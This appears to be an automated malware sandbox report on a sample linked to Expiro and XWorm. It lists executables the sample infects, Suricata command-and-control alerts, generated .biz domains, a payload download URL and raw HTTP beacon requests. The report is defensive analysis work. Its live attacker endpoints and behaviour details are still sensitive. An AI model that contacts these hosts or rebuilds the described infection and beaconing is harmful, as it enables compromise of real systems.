Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\kinit_objs\kinit.pdb source: alg.exe, 00000010.00000003.2980968904.0000000000460000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: AppVShNotify.pdb source: wdmvmswJ.pif, 0000000C.00000003.2353921741.000000001E6B0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb888 source: wdmvmswJ.pif, 0000000C.00000003.2173595593.000000001E710000.00000004.00001000.00020000.00000000.sdmp

Spreading

Infects executable files (exe, dll, sys, html)

Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Windows\System32\wbem\WmiApSrv.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Windows\System32\vds.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Windows\System32\alg.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\7-Zip\7zFM.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Windows\System32\snmptrap.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Windows\System32\Spectrum.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Windows Media Player\wmpnetwk.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Windows\System32\Locator.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\7-Zip\7z.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Windows\System32\AppVClient.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Windows\SysWOW64\perfhost.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\7-Zip\7zG.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Windows\System32\msiexec.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Windows\System32\VSSVC.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Windows\System32\wbengine.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Windows\System32\SearchIndexer.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Windows\System32\TieringEngineService.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files (x86)\AutoIt3\Au3Info.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Mozilla Firefox\updater.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files (x86)\AutoIt3\Au3Check.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Windows\System32\AgentService.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\7-Zip\Uninstall.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Windows\System32\FXSSVC.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Windows\System32\OpenSSH\ssh-agent.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	System file written: C:\Windows\System32\sppsvc.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Windows\System32\SensorDataService.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Windows\System32\msdtc.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02AF5908 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,	4_2_02AF5908
Source: C:\Users\Public\alpha.pif	Code function: 13_2_00020207 FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove,	13_2_00020207
Source: C:\Users\Public\alpha.pif	Code function: 13_2_0002589A FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose,	13_2_0002589A
Source: C:\Users\Public\alpha.pif	Code function: 13_2_00033E66 FindFirstFileW,FindNextFileW,FindClose,	13_2_00033E66
Source: C:\Users\Public\alpha.pif	Code function: 13_2_00024EC1 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,	13_2_00024EC1
Source: C:\Users\Public\alpha.pif	Code function: 13_2_0001532E GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPAX@Z,FindNextFileW,??_V@YAXPAX@Z,SetLastError,??_V@YAXPAX@Z,GetLastError,FindClose,	13_2_0001532E
Source: C:\Users\Public\alpha.pif	Code function: 17_2_0002589A FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose,	17_2_0002589A
Source: C:\Users\Public\alpha.pif	Code function: 17_2_00020207 FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove,	17_2_00020207
Source: C:\Users\Public\alpha.pif	Code function: 17_2_00033E66 FindFirstFileW,FindNextFileW,FindClose,	17_2_00033E66
Source: C:\Users\Public\alpha.pif	Code function: 17_2_00024EC1 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,	17_2_00024EC1
Source: C:\Users\Public\alpha.pif	Code function: 17_2_0001532E GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPAX@Z,FindNextFileW,??_V@YAXPAX@Z,SetLastError,??_V@YAXPAX@Z,GetLastError,FindClose,	17_2_0001532E

Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\java.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaw.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaws.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\java.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaw.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaws.exe	Jump to behavior

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.8:49708 -> 54.244.188.177:80
Source: Network traffic	Suricata IDS: 2051648 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz) : 192.168.2.8:65093 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2051648 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz) : 192.168.2.8:51366 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2051649 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz) : 192.168.2.8:61527 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2051649 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz) : 192.168.2.8:60770 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 62.60.190.120:7923 -> 192.168.2.8:49727
Source: Network traffic	Suricata IDS: 2852874 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 : 62.60.190.120:7923 -> 192.168.2.8:49727
Source: Network traffic	Suricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.8:49727 -> 62.60.190.120:7923
Source: Network traffic	Suricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.8:49800 -> 18.246.231.120:80
Source: Network traffic	Suricata IDS: 2852923 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) : 192.168.2.8:49727 -> 62.60.190.120:7923
Source: Network traffic	Suricata IDS: 2051654 - Severity 1 - ET MALWARE DNS Query to Expiro Domain (cikivjto .biz) : 192.168.2.8:50711 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2051651 - Severity 1 - ET MALWARE DNS Query to Expiro Domain (eufxebus .biz) : 192.168.2.8:58390 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2051651 - Severity 1 - ET MALWARE DNS Query to Expiro Domain (eufxebus .biz) : 192.168.2.8:57993 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2051653 - Severity 1 - ET MALWARE DNS Query to Expiro Domain (htwqzczce .biz) : 192.168.2.8:61989 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.8:50171 -> 18.141.10.107:80
Source: Network traffic	Suricata IDS: 2051653 - Severity 1 - ET MALWARE DNS Query to Expiro Domain (htwqzczce .biz) : 192.168.2.8:55730 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2051654 - Severity 1 - ET MALWARE DNS Query to Expiro Domain (cikivjto .biz) : 192.168.2.8:62117 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2051652 - Severity 1 - ET MALWARE DNS Query to Expiro Domain (napws .biz) : 192.168.2.8:50355 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2051648 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz) : 192.168.2.8:60253 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2051650 - Severity 1 - ET MALWARE DNS Query to Expiro Domain (kcyvxytog .biz) : 192.168.2.8:57471 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2051649 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz) : 192.168.2.8:60791 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2051648 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz) : 192.168.2.8:49846 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.8:56268 -> 82.112.184.197:80
Source: Network traffic	Suricata IDS: 2051650 - Severity 1 - ET MALWARE DNS Query to Expiro Domain (kcyvxytog .biz) : 192.168.2.8:57634 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2853193 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.8:49727 -> 62.60.190.120:7923
Source: Network traffic	Suricata IDS: 2051652 - Severity 1 - ET MALWARE DNS Query to Expiro Domain (napws .biz) : 192.168.2.8:60684 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2051649 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz) : 192.168.2.8:53706 -> 1.1.1.1:53

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: 62.60.190.120
Source: Malware configuration extractor	URLs: https://chichometextiles.com/wp-admin/233_Jwsmvmdweya

Queries random domain names (often used to prevent blacklisting and sinkholes)

Source: unknown

DNS traffic detected: English language letter frequency does not match the domain names

Connects to many different domains

Source: unknown

Network traffic detected: DNS query count 129

Contains functionality to check if a connection to the internet is available

Source: C:\Users\user\AppData\Local\Temp\x.exe

Code function: 4_2_02B0E4B8 InternetCheckConnectionA,

4_2_02B0E4B8

Detected TCP or UDP traffic on non-standard ports

Source: global traffic

TCP traffic: 192.168.2.8:49727 -> 62.60.190.120:7923

Executes massive DNS lookups (> 100)

Source: global traffic

DNS traffic detected: number of DNS queries: 129

Suricata IDS alerts with low severity for network traffic

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49707 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 44.221.84.105:80 -> 192.168.2.8:49711
Source: Network traffic	Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 54.244.188.177:80 -> 192.168.2.8:49708
Source: Network traffic	Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 54.244.188.177:80 -> 192.168.2.8:49708
Source: Network traffic	Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 18.141.10.107:80 -> 192.168.2.8:49731
Source: Network traffic	Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 18.141.10.107:80 -> 192.168.2.8:49731
Source: Network traffic	Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 44.221.84.105:80 -> 192.168.2.8:49711
Source: Network traffic	Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 34.211.97.45:80 -> 192.168.2.8:49790
Source: Network traffic	Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 34.211.97.45:80 -> 192.168.2.8:49790
Source: Network traffic	Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 13.251.16.150:80 -> 192.168.2.8:49749
Source: Network traffic	Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 47.129.31.212:80 -> 192.168.2.8:49752
Source: Network traffic	Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 18.208.156.248:80 -> 192.168.2.8:49771
Source: Network traffic	Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 18.208.156.248:80 -> 192.168.2.8:49771
Source: Network traffic	Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 3.254.94.185:80 -> 192.168.2.8:49802
Source: Network traffic	Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 3.254.94.185:80 -> 192.168.2.8:49802
Source: Network traffic	Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 18.246.231.120:80 -> 192.168.2.8:49779
Source: Network traffic	Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 18.246.231.120:80 -> 192.168.2.8:49779
Source: Network traffic	Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 34.246.200.160:80 -> 192.168.2.8:49745
Source: Network traffic	Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 34.246.200.160:80 -> 192.168.2.8:49745
Source: Network traffic	Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 3.94.10.34:80 -> 192.168.2.8:49785
Source: Network traffic	Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 3.94.10.34:80 -> 192.168.2.8:49785
Source: Network traffic	Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 47.129.31.212:80 -> 192.168.2.8:49752
Source: Network traffic	Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 13.251.16.150:80 -> 192.168.2.8:49749
Source: Network traffic	Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 35.164.78.200:80 -> 192.168.2.8:49753
Source: Network traffic	Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 35.164.78.200:80 -> 192.168.2.8:49753
Source: Network traffic	Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.245.163.56:443 -> 192.168.2.8:49716
Source: Network traffic	Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.245.163.56:443 -> 192.168.2.8:49776

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET /wp-admin/233_Jwsmvmdweya HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: chichometextiles.com
Source: global traffic	HTTP traffic detected: POST /xvpanbchxym HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /ks HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ssbzmoy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /iwwaryskplxdjo HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: cvgrf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /ludmpidgkyjmk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: npukfztj.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /i HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /pywymqfnuombtvtm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
